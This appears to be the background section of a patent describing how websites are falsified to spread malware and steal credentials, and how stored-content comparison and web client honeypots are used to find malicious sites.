Conventionally, the World Wide Web (hereinafter, referred to as “Web”), which is a system for easily exchanging text, images, videos, and the like on the Internet, has been the main form of use on the Internet, and various services, such as e-mailing, video viewing, and social networking, are being executed on the Web.
However, a general user may be victimized by a malicious Web site providing a malicious service. For example, a phishing site prepares a false Web site disguised as a genuine Web site, such that when a general user accesses the false Web site by mistake, the false site will input confidential information, such as credit card information, personal information, or authentication information without being noticed and the information will be leaked out to an attacker.
Further, in recent years, the Web has been used as infection routes of malware, which is malicious software. If a malicious Web site is accessed with a Web browser having vulnerability in the program, that malicious Web site sends back a content including a malicious code that attacks the Web browser. By loading the malicious code, the Web browser having vulnerability loses control over the program, and becomes infected with malware by being forcibly made to download and install the malware. By being falsified, the genuine site may be turned into such a malicious site, or changed into a site that becomes an entrance to the malicious site.
Falsification of a Web site may occur by leakage of authentication information of an administrator of the Web site. By being infected with malware, the malware may transmit the authentication information to an outside attacker to thereby leak out the authentication information, and as a result, the above mentioned falsification of the Web site may be caused.
Damage to general users by misuse of a falsified site needs to be kept at a minimum by finding the falsified site early. In order to identify whether a site has been falsified, a content before falsification is stored in advance, a change in the content is identified from a difference therefrom, and falsification is able to be found if there has been a change in the content that an administrator of the Web site is not aware of. The change in the content is able to be identified by use of a file history management tool (for example, see Non-Patent Literature 1).
Further, in recent years, by a computer terminal or a server (hereinafter, referred to as “host” without distinguishment between them) becoming infected with malware, destruction of information inside the host and cases where the host itself is abused as a stepping stone to new attacks have been occurring. Further, malware is also able to leak out information in the host to outside without permission. Since not only personal information, but also confidential information of a company, a government, a military organization, or the like may be leaked out, information leakage by malware infection has been a problem.
Infection means through various infection routes have been confirmed for malware, including, for example: infection by a user clicking and installing malware appearing as a file attached to an e-mail; malware appearing as general software distributed on a Web site; malware appearing as a P2P file; infection by malware being automatically downloaded and installed when a Web site including an attack code is browsed with a Web browser having vulnerability; and the like.
In particular, with respect to malware infection via the Web, there have been many cases, where a genuine Web site is falsified and that site becomes an entrance to a malicious site, recently. Since a redirection code to the malicious site is inserted in the falsified site, if a general user accesses the falsified site by mistake, the access is redirected to the malicious site automatically, and infection with malware is caused. As a cause of a general site being falsified, by an administrator of the general site being infected with malware and authentication information of the administrator of the general site being leaked out, the site is fraudulently invaded and the content is falsified, by an attacker.
In malware infection due to browsing of a Web site, by finding and listing such malicious Web sites from a Web space in advance, based on the list of those malicious Web sites, user communication is filtered and users are able to be protected from malware infection via the Web. One method of finding a malicious Web site from the Web space is examination of Web sites using a Web client honeypot.
A Web client honeypot is a decoy system for accessing a Web site using a vulnerable Web browser and detecting an attack causing malware infection. By patrolling the Web space by use of this Web client honey pot, a malicious site is able to be found (for example, see Non-Patent Literatures 2 and 3). Since a vast number of Web sites and URLs exist in the Web space, examination by efficient patrolling methods has been proposed (for example, see Non-Patent Literatures 4 and 5).